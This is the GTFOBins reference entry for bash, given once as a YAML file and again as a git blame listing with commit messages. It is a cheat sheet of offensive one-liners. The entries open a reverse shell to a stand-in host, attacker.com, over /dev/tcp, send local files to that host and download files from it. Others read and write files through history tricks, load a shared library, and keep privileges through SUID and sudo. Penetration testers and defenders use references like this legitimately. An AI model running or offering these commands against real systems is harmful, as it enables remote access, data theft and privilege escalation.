GTFOBins.github.io/_gtfobins/bash.md

---
functions:
  shell:
    - code: bash
  reverse-shell:
    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'
  file-upload:
    - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        export LFILE=file_to_send
        bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
    - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        export LFILE=file_to_send
        bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
  file-download:
    - description: Fetch a remote file via HTTP GET request.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        export LFILE=file_to_get
        bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
            3<>/dev/tcp/$RHOST/$RPORT \
            | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
    - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        export LFILE=file_to_get
        bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
  file-write:
    - code: |
        export LFILE=file_to_write
        bash -c 'echo DATA > $LFILE'
    - description: This adds timestamps to the output file.
      code: |
        LFILE=file_to_write
        HISTIGNORE='history *'
        history -c
        DATA
        history -w $LFILE
  file-read:
    - description: It trims trailing newlines and it's not binary-safe.
      code: |
        export LFILE=file_to_read
        bash -c 'echo "$(<$LFILE)"'
    - description: The read file content is surrounded by the current history content.
      code: |
        LFILE=file_to_read
        HISTTIMEFORMAT=$'\r\e[K'
        history -r $LFILE
        history
  library-load:
    - code: bash -c 'enable -f ./lib.so x'
  suid:
    - code: "./bash -p"
  sudo:
    - code: sudo bash
---
First commit 2018-05-21 21:14:41 +02:00			`---`
			`functions:`
Adopt new function names 2018-10-05 19:55:38 +02:00			`shell:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- code: bash`
Adopt new function names 2018-10-05 19:55:38 +02:00			`reverse-shell:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
			`code: \|`
			`export RHOST=attacker.com`
			`export RPORT=12345`
Fix bash revshell 2020-05-03 13:13:43 +02:00			`bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'`
Adopt new function names 2018-10-05 19:55:38 +02:00			`file-upload:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.`
			`code: \|`
			`export RHOST=attacker.com`
			`export RPORT=12345`
			`export LFILE=file_to_send`
			`bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'`
			- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
			`code: \|`
			`export RHOST=attacker.com`
			`export RPORT=12345`
			`export LFILE=file_to_send`
			`bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'`
Adopt new function names 2018-10-05 19:55:38 +02:00			`file-download:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- description: Fetch a remote file via HTTP GET request.`
			`code: \|`
			`export RHOST=attacker.com`
			`export RPORT=12345`
			`export LFILE=file_to_get`
			`bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \`
			`3<>/dev/tcp/$RHOST/$RPORT \`
			`\| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'`
			- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
			`code: \|`
			`export RHOST=attacker.com`
			`export RPORT=12345`
			`export LFILE=file_to_get`
			`bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'`
Add file-write to bash 2018-05-28 20:02:20 +02:00			`file-write:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- code: \|`
			`export LFILE=file_to_write`
Use DATA as a placeholder for file-write operations 2018-08-20 14:35:43 +02:00			`bash -c 'echo DATA > $LFILE'`
Add history file read/write to bash Close #21. 2018-09-13 18:49:09 +02:00			`- description: This adds timestamps to the output file.`
			`code: \|`
			`LFILE=file_to_write`
			`HISTIGNORE='history *'`
			`history -c`
			`DATA`
			`history -w $LFILE`
Reorder functions in binaries 2018-07-04 20:26:52 +02:00			`file-read:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- description: It trims trailing newlines and it's not binary-safe.`
			`code: \|`
			`export LFILE=file_to_read`
			`bash -c 'echo "$(<$LFILE)"'`
Add history file read/write to bash Close #21. 2018-09-13 18:49:09 +02:00			`- description: The read file content is surrounded by the current history content.`
			`code: \|`
			`LFILE=file_to_read`
			`HISTTIMEFORMAT=$'\r\e[K'`
			`history -r $LFILE`
			`history`
Add bash library-load 2019-11-29 13:49:37 +01:00			`library-load:`
			`- code: bash -c 'enable -f ./lib.so x'`
Adopt new function names 2018-10-05 19:55:38 +02:00			`suid:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- code: "./bash -p"`
Adopt new function names 2018-10-05 19:55:38 +02:00			`sudo:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- code: sudo bash`
First commit 2018-05-21 21:14:41 +02:00			`---`